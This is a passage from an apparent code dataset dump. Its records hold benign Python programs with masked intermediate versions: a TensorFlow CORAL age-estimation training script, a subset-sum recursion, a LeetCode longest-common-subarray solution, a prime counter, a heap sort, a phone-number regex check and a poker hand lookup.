checkpoint path')\n\nflags.DEFINE_string(\"graphs\", \"\", \"\")\n\nflags.DEFINE_integer('n_test', 10000, 'Number of test images')\n\nflags.DEFINE_string('test_txt', '', 'Test text(label) path')\n\nflags.DEFINE_string('test_img', '', 'Test images path')\n\nflags.DEFINE_string(\"output_loss_txt\", \"/yuwhan/Edisk/yuwhan/Edisk/4th_paper/age_banchmark/UTK/loss_CORAL.txt\", \"\")\n\nFLAGS = flags.FLAGS\nFLAGS(sys.argv)\n\noptimizer = tf.keras.optimizers.Adam(FLAGS.lr,beta_1=0.9, beta_2=0.99)\n\n\ndef _func(filename, label):\n\n image_string = tf.io.read_file(filename)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS.img_size - 8]) / 255.\n #decode_image = tf.image.random_crop(decode_image, [FLAGS.img_size - 8, FLAGS.img_size - 8, 3])\n\n if random() > 0.5:\n decode_image = tf.image.flip_left_right(decode_image)\n\n #decode_image = tf.image.per_image_standardization(decode_image)\n\n label = label - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes)\n \n return decode_image, one_hot, label\n\ndef val_func(name, label):\n\n image_string = tf.io.read_file(name)\n decode_image = tf.image.decode_jpeg(image_string, channels=3)\n decode_image = tf.image.resize(decode_image, [FLAGS.img_size - 8, FLAGS.img_size - 8]) / 255.\n #decode_image = tf.image.per_image_standardization(decode_image)\n\n label = int(label) - 16\n one_hot = tf.one_hot(label, FLAGS.num_classes) \n \n return decode_image, one_hot\n\n#@tf.function\ndef run_model(model, images):\n logits, probs = model(images, training=True)\n return logits, probs\n\[email protected]\ndef train_step(model, images, levels, imp):\n \n with tf.GradientTape() as tape:\n logits, probs = run_model(model, images)\n\n #total_loss = (-tf.reduce_sum((tf.nn.log_softmax(logits, axis=2)[:,:,1]*levels + tf.nn.log_softmax(logits, axis=2)[:,:,0]*(1-levels))*imp, 1))\n \n # total_loss = (-tf.reduce_sum( (tf.math.log_sigmoid(logits)*levels + tf.math.log(1. - tf.nn.sigmoid(logits))*(1-levels))*imp, 1))\n total_loss = (-tf.reduce_sum( (tf.math.log_sigmoid(logits)*levels + (tf.math.log_sigmoid(logits) - logits)*(1-levels))*imp, 1))\n #total_loss = -tf.reduce_sum((tf.math.log(tf.nn.softmax(logits, 2)[:, :, 1] + 1e-7) * levels \\\n # + tf.math.log(tf.nn.softmax(logits, 2)[:, :, 0] + 1e-7) * (1 - levels)) * imp, 1)\n\n total_loss = tf.reduce_mean(total_loss)\n\n gradients = tape.gradient(total_loss, model.trainable_variables)\n optimizer.apply_gradients(zip(gradients, model.trainable_variables))\n return total_loss\n\ndef task_importance_weights(data):\n label = np.array(data).astype(np.float32)\n num_examples = label.size\n\n y = np.unique(label)\n \n m = np.zeros(label.shape)\n\n for i, t in enumerate(np.arange(np.min(y), np.max(y))):\n m_k = np.max([label[label > t].size, \n num_examples - label[label > t].size])\n #print(m_k)\n m_k = tf.cast(tf.convert_to_tensor(m_k), tf.float32)\n m[i] = tf.sqrt(m_k)\n # m[i] = float(m_k)**(0.5)\n\n max_ = np.max(m)\n imp = tf.cast(m / max_, tf.float32)\n #print(imp)\n return imp\n \[email protected]\ndef test_MAE(model, images, labels):\n logits, probs = model(images, training=False)\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict, 1)\n grd_age = tf.argmax(labels, 1) + 1\n grd_age = tf.cast(grd_age, tf.float32)\n AE = tf.reduce_sum(tf.math.abs(grd_age - pre_age))\n return AE\n\ndef make_levels(labels):\n levels = []\n for i in range(FLAGS.batch_size):\n l = [1] * (labels[i].numpy()) + [0]*(FLAGS.num_classes - 1 - labels[i].numpy())\n l = tf.cast(l, tf.float32)\n levels.append(l)\n\n return tf.convert_to_tensor(levels, tf.float32)\n\ndef main(argv=None):\n\n # train_model = resnet_type1(input_shape=(FLAGS.img_size - 8, FLAGS.img_size - 8, 3), NUM_CLASSES=FLAGS.num_classes)\n train_model = ResNet34(input_shape=(FLAGS.img_size - 8, FLAGS.img_size - 8, FLAGS.ch), include_top=False,\n batch_size=FLAGS.batch_size, weight_path=FLAGS.weights, weights='imagenet')\n\n regularizer = tf.keras.regularizers.l2(0.000005)\n initializer = tf.keras.initializers.glorot_normal()\n\n for layer in train_model.layers:\n for attr in ['kernel_regularizer']:\n if hasattr(layer, attr):\n setattr(layer, attr, regularizer)\n # for attr_ in [\"kernel_initializer\"]:\n # if hasattr(layer, attr_):\n # setattr(layer, attr_, initializer)\n\n x = train_model.output\n avgpool = tf.keras.layers.GlobalAveragePooling2D()(x)\n # avgpool = tf.reshape(avgpool, [avgpool.shape[0], -1])\n # fc = tf.keras.layers.Dense(1, use_bias=False)(avgpool)\n\n # logits = Linear(NUM_CLASSES - 1)(fc)\n logits = tf.keras.layers.Dense(FLAGS.num_classes-1, use_bias=False)(avgpool)\n logits = Linear(FLAGS.num_classes - 1)(logits)\n probs = tf.nn.sigmoid(logits)\n\n train_model = tf.keras.Model(inputs=train_model.input, outputs=[logits, probs])\n train_model.summary()\n\n #for m in train_model.layers:\n # if isinstance(m, tf.keras.layers.Conv2D):\n # a = m.output_mask\n # n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n # m.weight.data.normal_(0, (2. / n)**.5)\n # elif isinstance(m, tf.keras.layers.BatchNormalization):\n # m.get_weights\n # m.weight.data.fill_(1)\n # m.bias.data.zero_()\n\n if FLAGS.pre_checkpoint is True:\n\n ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer)\n\n ckpt_manager = tf.train.CheckpointManager(ckpt, FLAGS.pre_checkpoint_path, max_to_keep=5)\n\n # if a checkpoint exists, restore the latest checkpoint.\n if ckpt_manager.latest_checkpoint:\n print(ckpt_manager.latest_checkpoint)\n ckpt.restore(ckpt_manager.latest_checkpoint)\n print ('Latest checkpoint restored!!')\n\n if FLAGS.train == True:\n \n data_name = np.loadtxt(FLAGS.txt_path, dtype='<U100', skiprows=0, usecols=0)\n data_name = [FLAGS.img_path + data_name_ for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.int32, skiprows=0, usecols=1)\n\n imp = task_importance_weights(data_label-16)\n imp = imp[0:FLAGS.num_classes-1]\n\n val_data_name = np.loadtxt(FLAGS.val_txt_path, dtype='<U100', skiprows=0, usecols=[0, 1, 2, 3])\n print(len(val_data_name))\n WM_img, WM_age = [], []\n WF_img, WF_age = [], []\n BM_img, BM_age = [], []\n BF_img, BF_age = [], []\n for i in range(len(val_data_name)):\n\n if val_data_name[i][2] == \"M\" and val_data_name[i][3] == \"W\":\n WM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WM_age.append(val_data_name[i][1])\n\n if val_data_name[i][2] == \"F\" and val_data_name[i][3] == \"W\":\n WF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n WF_age.append(val_data_name[i][1])\n\n if val_data_name[i][2] == \"M\" and val_data_name[i][3] == \"B\":\n BM_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BM_age.append(val_data_name[i][1])\n\n if val_data_name[i][2] == \"F\" and val_data_name[i][3] == \"B\":\n BF_img.append(FLAGS.val_img_path + val_data_name[i][0])\n BF_age.append(val_data_name[i][1])\n \n print(len(WM_img), len(WF_img), len(BM_img), len(BF_img))\n WM_img, WM_age = np.array(WM_img), np.array(WM_age)\n WF_img, WF_age = np.array(WF_img), np.array(WF_age)\n BM_img, BM_age = np.array(BM_img), np.array(BM_age)\n BF_img, BF_age = np.array(BF_img), np.array(BF_age)\n all_val_list = [[WM_img, WM_age], [WF_img, WF_age], [BM_img, BM_age], [BF_img, BF_age]]\n\n batch_idx = len(data_label) // FLAGS.batch_size\n\n #current_time = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n #train_log_dir = FLAGS.graphs + current_time + '/train'\n #val_log_dir = FLAGS.graphs + current_time + '/val'\n #train_summary_writer = tf.summary.create_file_writer(train_log_dir)\n #val_summary_writer = tf.summary.create_file_writer(val_log_dir)\n\n loss_f = open(FLAGS.output_loss_txt, \"w\")\n count = 0\n for epoch in range(FLAGS.epochs):\n\n A = list(zip(data_name, data_label))\n shuffle(A)\n data_name, data_label = zip(*A)\n data_name = np.array(data_name)\n data_label = np.array(data_label)\n\n data_generator = tf.data.Dataset.from_tensor_slices((data_name, data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(FLAGS.batch_size)\n data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n\n it = iter(data_generator)\n\n #imp = task_importance_weights(data_label)\n #imp = imp[0:FLAGS.num_classes-1]\n for step in range(batch_idx):\n\n batch_images, batch_labels, age = next(it)\n levels = make_levels(age)\n total_loss = train_step(train_model, batch_images, levels, imp)\n\n #with val_summary_writer.as_default():\n # tf.summary.scalar(u'total loss', loss, step=count)\n\n if count % 10 == 0:\n #MAE = test_MAE(train_model, batch_images, batch_labels, levels)\n print('Epoch: {} [{}/{}] loss = {}'.format(epoch + 1, step + 1, batch_idx, total_loss))\n\n if count % 100 == 0:\n test_list = [\"WM\", \"WF\", \"BM\", \"BF\"]\n for j in range(len(all_val_list)):\n val_img, val_lab = all_val_list[j]\n\n val_data_generator = tf.data.Dataset.from_tensor_slices((val_img, val_lab))\n val_data_generator = val_data_generator.map(val_func)\n val_data_generator = val_data_generator.batch(1)\n val_data_generator = val_data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n\n val_idx = len(val_img) // 1\n val_it = iter(val_data_generator)\n AE = 0\n\n for i in range(val_idx):\n img, lab = next(val_it)\n pre_age = test_MAE(train_model, img, lab)\n AE += pre_age\n\n print(\"MAE = {} ({})\".format(AE / len(val_img), test_list[j]))\n\n loss_f.write(\"Epochs: {}, step = {}\".format(epoch, count))\n loss_f.write(\" --> \")\n loss_f.write(test_list[j])\n loss_f.write(\": \")\n loss_f.write(str(AE / len(val_img)))\n loss_f.write(\", \")\n\n loss_f.write(\"\\n\")\n loss_f.flush()\n\n\n\n # print(\"==========\")\n # print(\"[2]MAE = {}\".format(MAE))\n # print(\"==========\")\n # model_dir = FLAGS.save_checkpoint\n # folder_name = int((count + 1)/val_idx)\n # folder_name_str = \"%s/%s\" % (model_dir, folder_name)\n # if not os.path.isdir(folder_name_str):\n # print(\"Make {} folder to save checkpoint\".format(folder_name))\n # os.makedirs(folder_name_str)\n # ckpt = tf.train.Checkpoint(train_model=train_model, optimizer=optimizer)\n # checkpoint_dir = folder_name_str + \"/\" + \"CORAL_{}_steps.ckpt\".format(count)\n # ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_dir, 5)\n # ckpt_manager.save()\n\n # with val_summary_writer.as_default():\n # tf.summary.scalar(u'[2]MAE', MAE, step=count)\n\n count += 1\n\n else:\n data_name = np.loadtxt(FLAGS.test_txt, dtype='<U100', skiprows=0, usecols=0)\n data_name = [FLAGS.test_img + data_name_ for data_name_ in data_name]\n data_label = np.loadtxt(FLAGS.txt_path, dtype=np.float32, skiprows=0, usecols=1)\n\n data_generator = tf.data.Dataset.from_tensor_slices((data_name, data_label))\n data_generator = data_generator.shuffle(len(data_name))\n data_generator = data_generator.map(_func)\n data_generator = data_generator.batch(1)\n data_generator = data_generator.prefetch(tf.data.experimental.AUTOTUNE)\n\n MAE = 0\n it = iter(data_generator)\n for i in range(FLAGS.n_test):\n\n image, labels, opp_labels = next(it)\n\n _, probs = train_model(image, training=False)\n\n predict = probs > 0.5\n predict = tf.cast(predict, tf.float32)\n pre_age = tf.reduce_sum(predict)\n age = tf.cast(age, tf.float32)\n MAE += tf.reduce_sum(tf.math.abs(grd_age - age))\n\n if i % 1000 == 0:\n print('{} image(s) for MAE = {}'.format(i + 1, MAE / (i + 1)))\n\n print('Total MAE = {}'.format(MAE / FLAGS.n_test))\n\nif __name__ == '__main__':\n app.run(main)\n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
import sys
sys.setrecursionlimit(10 ** 6)
n, s = map(int, input().split())
value = list(map(int, input().split()))
count = 0
def recursive(index, sum):
global count
if index == n:
if sum == s:
count += 1
return
recursive(index + 1, sum + value[index])
recursive(index + 1, sum)
recursive(0, 0)
if s == 0:
count -= 1
print(count)
|
normal
|
{
"blob_id": "f1aa12ec4ee2482db8abf1121a3443502544e1a2",
"index": 2815,
"step-1": "<mask token>\n\n\ndef recursive(index, sum):\n global count\n if index == n:\n if sum == s:\n count += 1\n return\n recursive(index + 1, sum + value[index])\n recursive(index + 1, sum)\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.setrecursionlimit(10 ** 6)\n<mask token>\n\n\ndef recursive(index, sum):\n global count\n if index == n:\n if sum == s:\n count += 1\n return\n recursive(index + 1, sum + value[index])\n recursive(index + 1, sum)\n\n\nrecursive(0, 0)\nif s == 0:\n count -= 1\nprint(count)\n",
"step-3": "<mask token>\nsys.setrecursionlimit(10 ** 6)\nn, s = map(int, input().split())\nvalue = list(map(int, input().split()))\ncount = 0\n\n\ndef recursive(index, sum):\n global count\n if index == n:\n if sum == s:\n count += 1\n return\n recursive(index + 1, sum + value[index])\n recursive(index + 1, sum)\n\n\nrecursive(0, 0)\nif s == 0:\n count -= 1\nprint(count)\n",
"step-4": "import sys\nsys.setrecursionlimit(10 ** 6)\nn, s = map(int, input().split())\nvalue = list(map(int, input().split()))\ncount = 0\n\n\ndef recursive(index, sum):\n global count\n if index == n:\n if sum == s:\n count += 1\n return\n recursive(index + 1, sum + value[index])\n recursive(index + 1, sum)\n\n\nrecursive(0, 0)\nif s == 0:\n count -= 1\nprint(count)\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
# leetcode 718 最长重复子数组
# 给两个整数数组 A 和 B ,返回两个数组中公共的、长度最长的子数组的长度。
#
# 示例 1:
# 输入:
# A: [1,2,3,2,1]
# B: [3,2,1,4,7]
# 输出: 3
# 解释:
# 长度最长的公共子数组是 [3, 2, 1]。
#
# 说明:
# 1 <= len(A), len(B) <= 1000
# 0 <= A[i], B[i] < 100
class Solution:
def findLength(self, A: [int], B: [int])->int:
"""
动态规划, 维护一个公共子串长度表DP
DP[i][j]表示A中以第i个元素,B中以第j个元素结尾的公共子串长度
如果A[i]==B[j], DP[i][j]=DP[i-1][j-1]+1
如果A[i]==B[j], DP[i][j]=0
时间复杂度为:O(mn)
:param A:
:param B:
:return:
"""
na = len(A)
nb = len(B)
# na行,nb列的矩阵
dp = [[0 for _ in range(nb)] for _ in range(na)]
for i in range(na):
for j in range(nb):
if A[i] == B[j]:
if i >= 1 and j >= 1:
dp[i][j] = 1 + dp[i-1][j-1]
else:
dp[i][j] = 1
else:
dp[i][j] = 0
max_length = max(max(row) for row in dp)
return max_length
sol = Solution()
la = [0,0,0,0,1]
lb = [1,0,0,0,0]
print(sol.findLength(la, lb))
|
normal
|
{
"blob_id": "b8219c21dc2cdd497d3de48c59c146a1fd1509ec",
"index": 6673,
"step-1": "class Solution:\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Solution:\n\n def findLength(self, A: [int], B: [int]) ->int:\n \"\"\"\n 动态规划, 维护一个公共子串长度表DP\n DP[i][j]表示A中以第i个元素,B中以第j个元素结尾的公共子串长度\n 如果A[i]==B[j], DP[i][j]=DP[i-1][j-1]+1\n 如果A[i]==B[j], DP[i][j]=0\n 时间复杂度为:O(mn)\n :param A:\n :param B:\n :return:\n \"\"\"\n na = len(A)\n nb = len(B)\n dp = [[(0) for _ in range(nb)] for _ in range(na)]\n for i in range(na):\n for j in range(nb):\n if A[i] == B[j]:\n if i >= 1 and j >= 1:\n dp[i][j] = 1 + dp[i - 1][j - 1]\n else:\n dp[i][j] = 1\n else:\n dp[i][j] = 0\n max_length = max(max(row) for row in dp)\n return max_length\n\n\n<mask token>\n",
"step-3": "class Solution:\n\n def findLength(self, A: [int], B: [int]) ->int:\n \"\"\"\n 动态规划, 维护一个公共子串长度表DP\n DP[i][j]表示A中以第i个元素,B中以第j个元素结尾的公共子串长度\n 如果A[i]==B[j], DP[i][j]=DP[i-1][j-1]+1\n 如果A[i]==B[j], DP[i][j]=0\n 时间复杂度为:O(mn)\n :param A:\n :param B:\n :return:\n \"\"\"\n na = len(A)\n nb = len(B)\n dp = [[(0) for _ in range(nb)] for _ in range(na)]\n for i in range(na):\n for j in range(nb):\n if A[i] == B[j]:\n if i >= 1 and j >= 1:\n dp[i][j] = 1 + dp[i - 1][j - 1]\n else:\n dp[i][j] = 1\n else:\n dp[i][j] = 0\n max_length = max(max(row) for row in dp)\n return max_length\n\n\n<mask token>\nprint(sol.findLength(la, lb))\n",
"step-4": "class Solution:\n\n def findLength(self, A: [int], B: [int]) ->int:\n \"\"\"\n 动态规划, 维护一个公共子串长度表DP\n DP[i][j]表示A中以第i个元素,B中以第j个元素结尾的公共子串长度\n 如果A[i]==B[j], DP[i][j]=DP[i-1][j-1]+1\n 如果A[i]==B[j], DP[i][j]=0\n 时间复杂度为:O(mn)\n :param A:\n :param B:\n :return:\n \"\"\"\n na = len(A)\n nb = len(B)\n dp = [[(0) for _ in range(nb)] for _ in range(na)]\n for i in range(na):\n for j in range(nb):\n if A[i] == B[j]:\n if i >= 1 and j >= 1:\n dp[i][j] = 1 + dp[i - 1][j - 1]\n else:\n dp[i][j] = 1\n else:\n dp[i][j] = 0\n max_length = max(max(row) for row in dp)\n return max_length\n\n\nsol = Solution()\nla = [0, 0, 0, 0, 1]\nlb = [1, 0, 0, 0, 0]\nprint(sol.findLength(la, lb))\n",
"step-5": "# leetcode 718 最长重复子数组\n# 给两个整数数组 A 和 B ,返回两个数组中公共的、长度最长的子数组的长度。\n#\n# 示例 1:\n# 输入:\n# A: [1,2,3,2,1]\n# B: [3,2,1,4,7]\n# 输出: 3\n# 解释:\n# 长度最长的公共子数组是 [3, 2, 1]。\n#\n# 说明:\n# 1 <= len(A), len(B) <= 1000\n# 0 <= A[i], B[i] < 100\n\n\nclass Solution:\n def findLength(self, A: [int], B: [int])->int:\n \"\"\"\n 动态规划, 维护一个公共子串长度表DP\n DP[i][j]表示A中以第i个元素,B中以第j个元素结尾的公共子串长度\n 如果A[i]==B[j], DP[i][j]=DP[i-1][j-1]+1\n 如果A[i]==B[j], DP[i][j]=0\n 时间复杂度为:O(mn)\n :param A:\n :param B:\n :return:\n \"\"\"\n na = len(A)\n nb = len(B)\n # na行,nb列的矩阵\n dp = [[0 for _ in range(nb)] for _ in range(na)]\n for i in range(na):\n for j in range(nb):\n if A[i] == B[j]:\n if i >= 1 and j >= 1:\n dp[i][j] = 1 + dp[i-1][j-1]\n else:\n dp[i][j] = 1\n else:\n dp[i][j] = 0\n max_length = max(max(row) for row in dp)\n return max_length\n\n\nsol = Solution()\nla = [0,0,0,0,1]\nlb = [1,0,0,0,0]\nprint(sol.findLength(la, lb))",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
'''Given a range of 2 numbers (i.e) L and R count the number of prime numbers in the range (inclusive of L and R ).
Input Size : L <= R <= 100000(complexity O(n) read about Sieve of Eratosthenes)
Sample Testcase :
INPUT
2 5
OUTPUT
3'''
x,y=map(int,input().split())
count=0
for i in range(x,y+1):
if i>1:
for j in range(2,i):
if(i%j==0):
break
else:
count+=1
print(count)
|
normal
|
{
"blob_id": "06848ec0e327fed1da00446cec6392c6f42130af",
"index": 2158,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(x, y + 1):\n if i > 1:\n for j in range(2, i):\n if i % j == 0:\n break\n else:\n count += 1\nprint(count)\n",
"step-3": "<mask token>\nx, y = map(int, input().split())\ncount = 0\nfor i in range(x, y + 1):\n if i > 1:\n for j in range(2, i):\n if i % j == 0:\n break\n else:\n count += 1\nprint(count)\n",
"step-4": "'''Given a range of 2 numbers (i.e) L and R count the number of prime numbers in the range (inclusive of L and R ).\nInput Size : L <= R <= 100000(complexity O(n) read about Sieve of Eratosthenes)\nSample Testcase :\nINPUT\n2 5\nOUTPUT\n3'''\n\nx,y=map(int,input().split())\ncount=0\nfor i in range(x,y+1):\n if i>1:\n for j in range(2,i):\n if(i%j==0):\n break\n else:\n count+=1\nprint(count)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import math
def max_heapity(arr, start, end):
root = start
while True:
child = 2 * root + 1
# 若子節點指標超出範圍則結束
if child > end:
break
# 先比較左右兩個子節點大小,選擇最大的那個子節點
if child + 1 <= end and arr[child] < arr[child + 1]:
child += 1
# 如果 root 的值小於 child 最大值,則交換 (符合 max-heap 的特性)
if arr[root] < arr[child]:
arr[root], arr[child] = arr[child], arr[root]
root = child
else:
break
def build_max_heap(arr):
n = len(arr)
for start in range(n // 2 - 1, -1, -1):
max_heapity(arr, start, n-1)
def heap_sort(arr):
# 首先將資料轉換為 heap 資料結構
build_max_heap(arr)
print("Max Heap:", arr)
# 我們將第一個元素(root)和已經排好的元素前一位(unsorted part)做交換
# 再重新調整 unsorted part 使其符合 max-heap 特性
# 直到排序完畢。
n = len(arr)
for i in range(n - 1, 0, -1):
arr[0], arr[i] = arr[i], arr[0]
max_heapity(arr, 0, i-1)
if __name__ == "__main__":
data = [38, 14, 57, 59, 52, 19]
print("Original:", data)
heap_sort(data) # heap: [59, 52, 57, 14, 38, 19]
print("Sorted:", data) # [14, 19, 38, 52, 57, 59]
print()
data = [9, 15, 12, 23, 33, 26, 7, 31, 42, 36]
print("original:", data)
heap_sort(data) # [42, 36, 26, 31, 33, 12, 7, 15, 23, 9]
print("Sorted:", data) # [7, 9, 12, 15, 23, 26, 31, 33, 36, 42]
|
normal
|
{
"blob_id": "2ffe4b0eb7af9b3a4d5724442b5409d27bfa92a1",
"index": 6130,
"step-1": "<mask token>\n\n\ndef max_heapity(arr, start, end):\n root = start\n while True:\n child = 2 * root + 1\n if child > end:\n break\n if child + 1 <= end and arr[child] < arr[child + 1]:\n child += 1\n if arr[root] < arr[child]:\n arr[root], arr[child] = arr[child], arr[root]\n root = child\n else:\n break\n\n\ndef build_max_heap(arr):\n n = len(arr)\n for start in range(n // 2 - 1, -1, -1):\n max_heapity(arr, start, n - 1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef max_heapity(arr, start, end):\n root = start\n while True:\n child = 2 * root + 1\n if child > end:\n break\n if child + 1 <= end and arr[child] < arr[child + 1]:\n child += 1\n if arr[root] < arr[child]:\n arr[root], arr[child] = arr[child], arr[root]\n root = child\n else:\n break\n\n\ndef build_max_heap(arr):\n n = len(arr)\n for start in range(n // 2 - 1, -1, -1):\n max_heapity(arr, start, n - 1)\n\n\ndef heap_sort(arr):\n build_max_heap(arr)\n print('Max Heap:', arr)\n n = len(arr)\n for i in range(n - 1, 0, -1):\n arr[0], arr[i] = arr[i], arr[0]\n max_heapity(arr, 0, i - 1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef max_heapity(arr, start, end):\n root = start\n while True:\n child = 2 * root + 1\n if child > end:\n break\n if child + 1 <= end and arr[child] < arr[child + 1]:\n child += 1\n if arr[root] < arr[child]:\n arr[root], arr[child] = arr[child], arr[root]\n root = child\n else:\n break\n\n\ndef build_max_heap(arr):\n n = len(arr)\n for start in range(n // 2 - 1, -1, -1):\n max_heapity(arr, start, n - 1)\n\n\ndef heap_sort(arr):\n build_max_heap(arr)\n print('Max Heap:', arr)\n n = len(arr)\n for i in range(n - 1, 0, -1):\n arr[0], arr[i] = arr[i], arr[0]\n max_heapity(arr, 0, i - 1)\n\n\nif __name__ == '__main__':\n data = [38, 14, 57, 59, 52, 19]\n print('Original:', data)\n heap_sort(data)\n print('Sorted:', data)\n print()\n data = [9, 15, 12, 23, 33, 26, 7, 31, 42, 36]\n print('original:', data)\n heap_sort(data)\n print('Sorted:', data)\n",
"step-4": "import math\n\n\ndef max_heapity(arr, start, end):\n root = start\n while True:\n child = 2 * root + 1\n if child > end:\n break\n if child + 1 <= end and arr[child] < arr[child + 1]:\n child += 1\n if arr[root] < arr[child]:\n arr[root], arr[child] = arr[child], arr[root]\n root = child\n else:\n break\n\n\ndef build_max_heap(arr):\n n = len(arr)\n for start in range(n // 2 - 1, -1, -1):\n max_heapity(arr, start, n - 1)\n\n\ndef heap_sort(arr):\n build_max_heap(arr)\n print('Max Heap:', arr)\n n = len(arr)\n for i in range(n - 1, 0, -1):\n arr[0], arr[i] = arr[i], arr[0]\n max_heapity(arr, 0, i - 1)\n\n\nif __name__ == '__main__':\n data = [38, 14, 57, 59, 52, 19]\n print('Original:', data)\n heap_sort(data)\n print('Sorted:', data)\n print()\n data = [9, 15, 12, 23, 33, 26, 7, 31, 42, 36]\n print('original:', data)\n heap_sort(data)\n print('Sorted:', data)\n",
"step-5": "import math\n\n\ndef max_heapity(arr, start, end):\n root = start\n while True:\n child = 2 * root + 1\n # 若子節點指標超出範圍則結束\n if child > end:\n break\n\n # 先比較左右兩個子節點大小,選擇最大的那個子節點\n if child + 1 <= end and arr[child] < arr[child + 1]:\n child += 1\n\n # 如果 root 的值小於 child 最大值,則交換 (符合 max-heap 的特性)\n if arr[root] < arr[child]:\n arr[root], arr[child] = arr[child], arr[root]\n root = child\n else:\n break\n\n\ndef build_max_heap(arr):\n n = len(arr)\n for start in range(n // 2 - 1, -1, -1):\n max_heapity(arr, start, n-1)\n\n\ndef heap_sort(arr):\n # 首先將資料轉換為 heap 資料結構\n build_max_heap(arr)\n print(\"Max Heap:\", arr)\n\n # 我們將第一個元素(root)和已經排好的元素前一位(unsorted part)做交換\n # 再重新調整 unsorted part 使其符合 max-heap 特性\n # 直到排序完畢。\n n = len(arr)\n for i in range(n - 1, 0, -1):\n arr[0], arr[i] = arr[i], arr[0]\n max_heapity(arr, 0, i-1)\n\n\nif __name__ == \"__main__\":\n data = [38, 14, 57, 59, 52, 19]\n print(\"Original:\", data)\n heap_sort(data) # heap: [59, 52, 57, 14, 38, 19]\n print(\"Sorted:\", data) # [14, 19, 38, 52, 57, 59]\n\n print()\n data = [9, 15, 12, 23, 33, 26, 7, 31, 42, 36]\n print(\"original:\", data)\n heap_sort(data) # [42, 36, 26, 31, 33, 12, 7, 15, 23, 9]\n print(\"Sorted:\", data) # [7, 9, 12, 15, 23, 26, 31, 33, 36, 42]\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import re
n = input("電話番号を入力してください>>")
pattern = r'[\(]{0,1}[0-9]{2,4}[\)\-\(]{0,1}[0-9]{2,4}[\)\-]{0,1}[0-9]{3,4}'
if re.findall(pattern, n):
print(n, "は電話番号の形式です")
else:
print(n, "は電話番号の形式ではありません")
|
normal
|
{
"blob_id": "7ea81f83f556fcc55c9c9d44bcd63c583829fc08",
"index": 8977,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif re.findall(pattern, n):\n print(n, 'は電話番号の形式です')\nelse:\n print(n, 'は電話番号の形式ではありません')\n",
"step-3": "<mask token>\nn = input('電話番号を入力してください>>')\npattern = (\n '[\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-]{0,1}[0-9]{3,4}')\nif re.findall(pattern, n):\n print(n, 'は電話番号の形式です')\nelse:\n print(n, 'は電話番号の形式ではありません')\n",
"step-4": "import re\nn = input('電話番号を入力してください>>')\npattern = (\n '[\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-\\\\(]{0,1}[0-9]{2,4}[\\\\)\\\\-]{0,1}[0-9]{3,4}')\nif re.findall(pattern, n):\n print(n, 'は電話番号の形式です')\nelse:\n print(n, 'は電話番号の形式ではありません')\n",
"step-5": "import re\n\nn = input(\"電話番号を入力してください>>\")\npattern = r'[\\(]{0,1}[0-9]{2,4}[\\)\\-\\(]{0,1}[0-9]{2,4}[\\)\\-]{0,1}[0-9]{3,4}'\nif re.findall(pattern, n):\n print(n, \"は電話番号の形式です\")\nelse:\n print(n, \"は電話番号の形式ではありません\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from deuces.card import Card
from deuces.deck import Deck
from fast_utils.hand_strength.original_HS import *
from fast_utils.hand_strength.nn_HS import encode_hs
from fast_utils.expected_hand_strength.nn_EHS import *
from keras.models import load_model
def read_lookup_table(hole_cards, lookup_table):
"""
Reads the preflop lookup table preflop_EHSs.txt.
Args:
hole_cards: list of int (deuces cards)
lookup_table: read from preflop_EHSs.txt
Return:
tuple (float, float): EHS, EHS^2
"""
sorted_hole = sorted(hole_cards)
sorted_hole.reverse()
card_strings = [Card.int_to_str(card) for card in sorted_hole]
if card_strings[0][1] != card_strings[1][1]:
suited = False
else:
suited = True
card_strings[0] = card_strings[0][0] + 'd'
if suited:
card_strings[1] = card_strings[1][0] + 'd'
else:
card_strings[1] = card_strings[1][0] + 's'
card_strings = tuple(card_strings)
return lookup_table[card_strings]
|
normal
|
{
"blob_id": "8503998fc881f47dc695d3ea4c7f56fa65a96e8a",
"index": 2874,
"step-1": "<mask token>\n",
